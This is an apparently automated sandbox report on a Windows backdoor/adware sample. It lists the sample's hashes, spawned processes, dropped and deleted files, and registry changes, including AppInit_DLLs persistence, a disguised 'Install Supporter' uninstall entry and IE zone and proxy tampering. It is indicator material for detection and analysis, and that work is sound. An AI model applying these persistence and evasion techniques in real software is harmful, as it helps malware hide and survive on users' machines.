Backdoor.Win32.PcClient_efd952ab4b
not-a-virus:AdWare.Win32.MultiPlug.bwof (Kaspersky), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Backdoor, Adware
This description was automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
MD5: efd952ab4bdc43976f26649917fafe30
SHA1: 856d83f4e556896238763888ef6974d3cf72a9b9
SHA256: 6ffdd764fe0da9f334551d204b546511c3a1e6d2043a8e6eee7e9c8aa1ae783c
SSDeep: 6144:RrJbUzkuvcBYC47l2xb8YFZu5i/ 4G/7No3t01tO768G Conw15:Rr6kuveY33sZmi/ To3tKtO768Hnw15
Size: 322176 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: ShowAppIt
Created at: 2013-03-12 10:51:45
Analyzed on: Windows XP SP3 32-bit
Summary:
Backdoor: malware that enables remote control of the victim's machine.
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
putfu.exe:1100
usetup.exe:644
rundll32.exe:1252
rundll32.exe:1972
Upd Inst.exe:1788
Upd Inst.exe:212
%original file name%.exe:1936
The Backdoor injects its code into the following process(es):
No injected processes were found.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process putfu.exe:1100 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\Assistant.dll (264574 bytes)
%Program Files%\AssistantSvc.dll (174 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)
The process usetup.exe:644 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\ShowAppIt\Upd Inst\Upd Inst.exe (26080 bytes)
The process Upd Inst.exe:212 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%WinDir%\Tasks\Upd Inst-S-3301306948.job (648 bytes)
%Documents and Settings%\All Users\Application Data\ShowAppIt\Upd Inst\3301306948.ini (36300 bytes)
The process %original file name%.exe:1936 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1[1].txt (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B} (4 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\TsuDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x86\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsuE7C96BC7.dll (2569 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.dat (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe (15 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AE3B6594.dat (16424 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Readme.txt (2 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x64\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.usetup.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin9E1A.bat (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.putfu.exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1_1.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\efd952ab4bdc43976f26649917fafe30.log (1671022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1.ini (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\1_1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.putfu.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.loversion[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Addons (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Addons\usetup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Addons\putfu.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsuE7C96BC7.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.usetup.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x86\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin9E1A.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AE3B6594.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x86 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Readme.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x64\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.loversion[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1_1.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll (0 bytes)
Registry activity
The process putfu.exe:1100 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"data.1" = "jms9X5UQCQC/qdefABMMWdqbSPhBjrBeg2kltM6CV9laMoFMFie5D3 I3Cy gz98JM4V6i4T4Y0qkyk2B2o63bLcdN ZyLASrmsuJ3"
"date" = "1412210293"
"data.0" = "tMzCW3FyIL1BGncdefOSb9YJfudMlwX/b8Ua0F9BwvC8b3rxI9YbqXR6Up/bNSoruW7pgx1JQIKE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"CategoryName" = ""
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"51d2f2ea" = "RPAj/YV/c/Ay/Xl/a//x/WV/cPAl/Y//alAf/YP/GPAf/B//VP/j/Cx/V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"usr.0" = "lzlOIzOQIKEG xztvq"
"usr.1" = "gzR24bxztvqomjlhab"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"916e5338" = "%Program Files%\Assistant.dll"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\ASSIST~1.DLL,_uninstall /un /uq"
"NoRepair" = "1"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"uuid" = "baadc0de-baadbeef-a8a67a25"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c5705860" = "Vx////%%"
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0e93c3f3" = "///%"
"fe94ce1e" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"f0bf0bde" = "///%"
"3c09c42b" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c5705860" = "Vx////%%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"65114b36" = "Vl/l////"
"e46c271e" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c99a5f5c" = "///%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"414bc593" = "///%"
"c24899a6" = "MP/f/CF/Mx/l/C/////%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"6185d035" = "VP/h/CP/V//l////"
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"dlpath" = "c:\progra~1\assist~1.dll"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"svi" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0dc3ee96" = "/P////%%"
"7367429f" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"svpath" = "c:\progra~1\AssistantSvc.dll"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"LRTS" = "0"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"27ddcf6f" = "///%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"f0bf0bde" = "///%"
"f1f24e29" = "Vl/l/C/////%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"NoModify" = "1"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\ASSIST~1.DLL,_uninstall /un"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 03 90 46 EB 53 8A B4 55 EF 6D 33 5A 88 47 EB"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"Install_Dir" = "%Program Files%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c99a5f5c" = "///%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"iiid" = "1"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"2d71d5ab" = "V/////%%"
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"65114b36" = "Vl/l////"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0c230bcb" = "///%"
"72758a5d" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"6185d035" = "VP/h/CP/V//l////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"51d2f2ea" = "RPAj/YV/c/Ay/Xl/a//x/WV/cPAl/Y//alAf/YP/GPAf/B//VP/j/Cx/V/////%%"
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"
"340d3099" = "/P////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"iiid" = "1"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs" = "c:\progra~1\assist~1.dll"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"LRTS" = "0"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"n" = "1"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"data.0" = "tMzCW3FyIL1BGncdefOSb9YJfudMlwX/b8Ua0F9BwvC8b3rxI9YbqXR6Up/bNSoruW7pgx1JQIKE"
"data.1" = "jms9X5UQCQC/qdefABMMWdqbSPhBjrBeg2kltM6CV9laMoFMFie5D3 I3Cy gz98JM4V6i4T4Y0qkyk2B2o63bLcdN ZyLASrmsuJ3"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"Mode" = "4026531840"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"a2e3b941" = "///%"
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"Publisher" = "Certified Publisher"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"InstallDate" = "20131002"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"414bc593" = "///%"
"587b5709" = "V/////%%"
"a0743acc" = "N/////%%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"usr.1" = "gzR24bxztvqomjlhab"
"usr.0" = "lzlOIzOQIKEG xztvq"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0c230bcb" = "///%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"Mode" = "4026531840"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"493c7345" = ""
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"7f69fa1f" = "///%"
"72758a5d" = "///%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"uuid" = "baadc0de-baadbeef-a8a67a25"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"3c09c42b" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"8b9e4cbc" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"bbf88800" = "///%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"493c7345" = ""
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"Version" = "22021985"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"DisplayName" = "Install Supporter 1.80"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c24899a6" = "MP/f/CF/Mx/l/C/////%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"date" = "1412210293"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"svn" = "Install Supporter"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"bbf88800" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"svx" = ""
"svt" = "1412210293"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"State" = "0"
The Backdoor modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
